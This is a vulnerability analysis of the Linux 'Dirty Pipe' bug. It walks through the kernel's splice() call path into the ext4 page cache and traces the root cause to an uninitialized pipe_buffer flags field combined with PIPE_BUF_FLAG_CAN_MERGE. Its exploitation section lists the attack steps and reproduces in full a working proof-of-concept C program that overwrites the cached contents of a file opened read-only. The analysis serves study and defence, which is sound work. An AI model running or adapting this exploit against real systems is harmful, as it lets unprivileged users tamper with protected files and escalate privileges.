The Linux system call splice copies data from one fd directly into another fd without passing through user space. It is declared as follows:

#define _GNU_SOURCE         /* See feature_test_macros(7) */
#include <fcntl.h>

ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

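Each fd here falls into one of two cases, pipe fd or file fd (and at least one of the two must be a pipe), so do_splice checks the fd types and performs a different kind of transfer for each combination.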
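For reference, this is roughly what the file-to-pipe direction looks like from user space. It is a sketch under assumptions: toy_temp_file_with and toy_read_via_splice are invented helpers, the temporary file lives under /tmp, and the file system there is assumed to support splice.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Create an unlinked temporary file holding text; returns its fd or -1. */
static int toy_temp_file_with(const char *text)
{
    char path[] = "/tmp/toy_splice_XXXXXX";
    size_t len = strlen(text);
    int fd = mkstemp(path);

    if (fd < 0)
        return -1;
    unlink(path);                       /* the fd keeps the file alive */
    if (write(fd, text, len) != (ssize_t)len) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Fetch len bytes at file offset off by way of a pipe: splice() moves
 * file -> pipe, read() moves pipe -> out. Returns bytes delivered or -1. */
static ssize_t toy_read_via_splice(int fd, loff_t off, char *out, size_t len)
{
    int p[2];
    ssize_t n;

    assert(out != NULL);
    if (pipe(p) != 0)
        return -1;
    n = splice(fd, &off, p[1], NULL, len, 0);
    if (n > 0)
        n = read(p[0], out, (size_t)n);
    close(p[0]);
    close(p[1]);
    return n;
}
```

Between the splice() and the read(), the pipe holds no copy of the data, only a reference to the file's cache page.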

Here we only need the case where the From-fd is a file and the To-fd is a pipe, i.e. data going from a file into a pipe:

/*
 * Determine where to splice to/from.
 */
long do_splice(struct file *in, loff_t __user *off_in,
        struct file *out, loff_t __user *off_out,
        size_t len, unsigned int flags)
{
    struct pipe_inode_info *ipipe;
    struct pipe_inode_info *opipe;
    loff_t offset;
    long ret;

    ipipe = get_pipe_info(in);
    opipe = get_pipe_info(out);
    ...;

    // when data is copied from a file into a pipe
    if (opipe) {
        ...
        // wait until the pipe has free space
        if (out->f_flags & O_NONBLOCK)
            flags |= SPLICE_F_NONBLOCK;

        pipe_lock(opipe);
        ret = wait_for_space(opipe, flags);
        // once the pipe has free space
        if (!ret) {
            unsigned int p_space;
            // work out how much data to transfer
            /* Don't try to read more the pipe has space for. */
            p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
            len = min_t(size_t, len, p_space << PAGE_SHIFT);
            // perform the actual transfer
            ret = do_splice_to(in, &offset, opipe, len, flags);
        }
        ...
        return ret;
    }

    ...
}

In do_splice_to, the kernel calls the splice_read function that the file's file system provides:

/*
 * Attempt to initiate a splice from a file to a pipe.
 */
static long do_splice_to(struct file *in, loff_t *ppos,
             struct pipe_inode_info *pipe, size_t len,
             unsigned int flags)
{
    int ret;

    if (unlikely(!(in->f_mode & FMODE_READ)))
        return -EBADF;

    ret = rw_verify_area(READ, in, ppos, len);
    if (unlikely(ret < 0))
        return ret;

    if (unlikely(len > MAX_RW_COUNT))
        len = MAX_RW_COUNT;
    // call the splice_read function
    if (in->f_op->splice_read)
        return in->f_op->splice_read(in, ppos, pipe, len, flags);
    return default_file_splice_read(in, ppos, pipe, len, flags);
}

Taking ext4, the most common Linux file system, as an example, these are some of the key methods it sets:

// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
    ...
    .read_iter    = ext4_file_read_iter,
    ...
    .splice_read  = generic_file_splice_read,
    ...
};

So do_splice_to ends up calling generic_file_splice_read to transfer the data:

/**
 * generic_file_splice_read - splice data from file to a pipe
 * @in:      file to splice from
 * @ppos:    position in @in
 * @pipe:    pipe to splice to
 * @len:     number of bytes to splice
 * @flags:   splice modifier flags
 *
 * Description:
 *    Will read pages from given file and fill them into a pipe. Can be
 *    used as long as it has more or less sane ->read_iter().
 *
 */
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
                 struct pipe_inode_info *pipe, size_t len,
                 unsigned int flags)
{
    struct iov_iter to;
    struct kiocb kiocb;
    unsigned int i_head;
    int ret;

    // build an iov_iter from the pipe structure
    iov_iter_pipe(&to, READ, pipe, len);
    i_head = to.head;
    // set up the kiocb
    init_sync_kiocb(&kiocb, in);
    kiocb.ki_pos = *ppos;
    // call call_read_iter to perform the actual data transfer !!!
    ret = call_read_iter(in, &kiocb, &to);
    // if the transfer succeeded
    if (ret > 0) {
        // update the file position and access time
        *ppos = kiocb.ki_pos;
        file_accessed(in);
    // if the transfer failed
    } else if (ret < 0) {
        to.head = i_head;
        to.iov_offset = 0;
        iov_iter_advance(&to, 0); /* to free what was emitted */
        /*
         * callers of ->splice_read() expect -EAGAIN on
         * "can't put anything in there", rather than -EFAULT.
         */
        if (ret == -EFAULT)
            ret = -EAGAIN;
    }

    return ret;
}

The code of generic_file_splice_read shows that it ultimately calls call_read_iter to transfer the data, and that function in turn calls the file system's own read_iter function:

static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
                     struct iov_iter *iter)
{
    return file->f_op->read_iter(kio, iter);
}

From ext4_file_operations we know that call_read_iter ends up in ext4_file_read_iter:

static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
    struct inode *inode = file_inode(iocb->ki_filp);
    // a few simple checks
    if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
        return -EIO;

    if (!iov_iter_count(to))
        return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
    if (IS_DAX(inode))
        return ext4_dax_read_iter(iocb, to);
#endif
    if (iocb->ki_flags & IOCB_DIRECT)
        return ext4_dio_read_iter(iocb, to);
    // the path taken when O_DIRECT is not set
    return generic_file_read_iter(iocb, to);
}

That function in turn calls generic_file_read_iter:

/**
 * generic_file_read_iter - generic filesystem read routine
 * @iocb:    kernel I/O control block
 * @iter:    destination for the data read
 *
 * This is the "read_iter()" routine for all filesystems
 * that can use the page cache directly.
 * Return:
 * * number of bytes copied, even for partial reads
 * * negative error code if nothing was read
 */
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    size_t count = iov_iter_count(iter);
    ssize_t retval = 0;

    if (!count)
        goto out; /* skip atime */

    if (iocb->ki_flags & IOCB_DIRECT) {
        ...
    }
    // continue down the call chain
    retval = generic_file_buffered_read(iocb, iter, retval);
out:
    return retval;
}

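Next comes generic_file_buffered_read. The function is too long to paste here, so I will only outline what it does:

Look up a previously mapped file cache page in the file's existing page cache mapping
- If there is no cached page, read the file data from disk and create a new cache page.
- If there is a cached page but it is out of date, refresh it
At this point a file cache page is guaranteed to exist, so copy_page_to_iter is called to copy the data on that cache page into the pipe.

This is exactly the function introduced earlier, so the whole splice system call can now be tied to the uninitialized-field bug on the pipe side.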

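IV. Root Cause

This vulnerability did not appear in one step; it results from the combination of mistakes in two commits:

new iov_iter flavour: pipe-backed - linux commit 241699: introduces the uninitialized-field bug. Neither push_pipe nor copy_page_to_iter_pipe initializes the flags field when setting up a pipe_buffer structure.

pipe: merge anon_pipe_buf*_ops - linux commit f6dd97: before this commit, the kernel decided whether a pipe_buf could be merged by comparing the address in pipe_buf->ops. That is not elegant, because the function pointers behind pipe_buf->ops are the same regardless of whether merging is allowed: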

// fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

static const struct pipe_buf_operations anon_pipe_buf_nomerge_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

static const struct pipe_buf_operations packet_pipe_buf_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

Code this tricky is far from elegant, so in this commit (f6dd97) Linux refactored that part and brought in a new pipe buf flag, PIPE_BUF_FLAG_CAN_MERGE:

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU       0x01  /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC    0x02  /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT      0x04  /* page is a gift */
#define PIPE_BUF_FLAG_PACKET    0x08  /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10  /* can merge buffers */     // <= the newly introduced flag

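The refactoring itself is fine; its only side effect is the introduction of the new pipe buf flag PIPE_BUF_FLAG_CAN_MERGE.

Although the first commit introduced the uninitialized-field bug, on its own it could not do much harm, because none of the available pipe buf flags was useful for exploitation. Once the second commit introduced PIPE_BUF_FLAG_CAN_MERGE, however, the bug became deadly: through the missing initialization a new pipe_buf can inherit an old flag such as PIPE_BUF_FLAG_CAN_MERGE, which breaks the integrity of the pipe buf and allows writes to pages that should never be written to (pages that should not carry PIPE_BUF_FLAG_CAN_MERGE, such as file cache pages).

Note that the read-only pages mentioned here are not protected inside the pipe by permission checks or similar mechanisms; they are protected only by the logic the pipe implements. So once that logic goes wrong, the pipe can write to read-only pages, which leads to arbitrary file writes.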

V. Exploitation

From the code analysis above we can derive the following exploit chain:

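Create a pipe (make sure not to pass O_DIRECT)
Write enough data into the pipe to fill it, so that every pipe_buffer in the pipe structure has PIPE_BUF_FLAG_CAN_MERGE set in its flags.
Read all of the data back out of the pipe, releasing every pipe_buffer.
Call splice to transfer data from a readable file into the pipe, with a length that is not a multiple of the page size. The head position of the pipe is then bound to have a pipe_buffer whose page points at the file cache and whose flags are PIPE_BUF_FLAG_CAN_MERGE.

Because flags is not initialized when a pipe_buffer is reused, it still holds PIPE_BUF_FLAG_CAN_MERGE here.
Continue by writing the target data into the pipe. Since PIPE_BUF_FLAG_CAN_MERGE is still set, the newly written data is merged directly into the file cache page that the pipe_buffer points at.
When the file is accessed afterwards, the kernel returns the data from the modified file cache, which achieves an arbitrary file write at the kernel level.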
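The chain can be replayed on a toy model in user space. Everything here is an assumption made for illustration: struct toy_buf is a one-slot stand-in for pipe_buffer, an ordinary char array plays the file cache page, and the init_flags parameter models the fix named in the affected-range line at the top (initializing flags in a new pipe_buffer). It is not kernel code.

```c
#include <assert.h>
#include <string.h>

#define TOY_FLAG_CAN_MERGE 0x10u   /* same value as PIPE_BUF_FLAG_CAN_MERGE */

struct toy_buf {
    char *page;
    unsigned int offset, len, flags;
};

/* Fill: an ordinary write claims the slot and marks it mergeable. */
static void toy_write_new(struct toy_buf *b, char *anon_page,
                          const char *src, unsigned int n)
{
    memcpy(anon_page, src, n);
    b->page = anon_page;
    b->offset = 0;
    b->len = n;
    b->flags = TOY_FLAG_CAN_MERGE;
}

/* Drain: the data is gone, but nothing resets flags. */
static void toy_drain(struct toy_buf *b)
{
    b->page = NULL;
    b->len = 0;
}

/* Splice: the slot now references the cache page. init_flags selects the
 * vulnerable behaviour (0) or the fixed one (non-zero). */
static void toy_splice(struct toy_buf *b, char *cache_page,
                       unsigned int off, unsigned int n, int init_flags)
{
    b->page = cache_page;
    b->offset = off;
    b->len = n;
    if (init_flags)
        b->flags = 0;
}

/* Later write: appended in place only if the slot is mergeable.
 * Returns 1 if the bytes landed in b->page, 0 otherwise. */
static int toy_write_merge(struct toy_buf *b, const char *src, unsigned int n)
{
    assert(b->page != NULL);
    if (!(b->flags & TOY_FLAG_CAN_MERGE))
        return 0;
    memcpy(b->page + b->offset + b->len, src, n);
    b->len += n;
    return 1;
}
```

With init_flags set to 0 the final write lands in the array that plays the cache page; with init_flags set it is refused, and a real pipe would then place the data in a page of its own.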

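Note that modifying the file cache "by accident" through the vulnerability does not cause the cache page to be written back to disk. Only when some other part of the kernel legitimately modifies that cache page and thereby marks it dirty will the modified page be saved to disk.

The kernel decides whether a file cache page is dirty not by checking whether its data has changed but by looking at its dirty flag, and rewriting the file cache through Dirty Pipe does not touch that flag.

Since cm4all has already published a very clear and readable POC, it is reproduced here: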

#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* for splice() and F_GETPIPE_SZ when built as C */
#endif
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();

    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];

    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }

    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }

    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }

    /* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);

    if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }

    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t end_offset = offset + (loff_t)data_size;
    if (end_offset > next_page) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }

    /* open the input file and validate the specified offset */
    const int fd = open(path, O_RDONLY); // yes, read-only! :-)
    if (fd < 0) {
        perror("open failed");
        return EXIT_FAILURE;
    }

    struct stat st;
    if (fstat(fd, &st)) {
        perror("stat failed");
        return EXIT_FAILURE;
    }

    if (offset > st.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }

    if (end_offset > st.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }

    /* create the pipe with all flags initialized with
       PIPE_BUF_FLAG_CAN_MERGE */
    int p[2];
    prepare_pipe(p);

    /* splice one byte from before the specified offset into the
       pipe; this will add a reference to the page cache, but
       since copy_page_to_iter_pipe() does not initialize the
       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    --offset;
    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (nbytes == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }

    /* the following write will not create a new pipe_buffer, but
       will instead write into the page cache, because of the
       PIPE_BUF_FLAG_CAN_MERGE flag */
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)nbytes < data_size) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }

    printf("It worked!\n");
    return EXIT_SUCCESS;
}

Running the POC goes smoothly: the file is opened read-only, yet the write to it succeeds.
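The argument checks in the POC encode the limits of the technique. Restated as a stand-alone predicate (toy_target_ok is an invented name and a 4096-byte page is assumed):

```c
#include <assert.h>
#include <stdbool.h>

#define TOY_PAGE_SIZE 4096LL   /* assumed page size */

/* Mirrors the argument checks in the POC's main(): can data_size bytes
 * be written at offset into a file of file_size bytes? */
static bool toy_target_ok(long long offset, long long data_size,
                          long long file_size)
{
    long long next_page = (offset | (TOY_PAGE_SIZE - 1)) + 1;
    long long end_offset = offset + data_size;

    assert(offset >= 0 && data_size >= 0);
    if (offset % TOY_PAGE_SIZE == 0)
        return false;   /* the byte before offset must sit in the same page */
    if (end_offset > next_page)
        return false;   /* the merge cannot cross a page boundary */
    if (offset > file_size || end_offset > file_size)
        return false;   /* the file cannot be enlarged */
    return true;
}
```

The first rule exists because the POC splices the single byte just before offset to get the cache page into the pipe; the other two follow from the merge staying inside one existing page.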
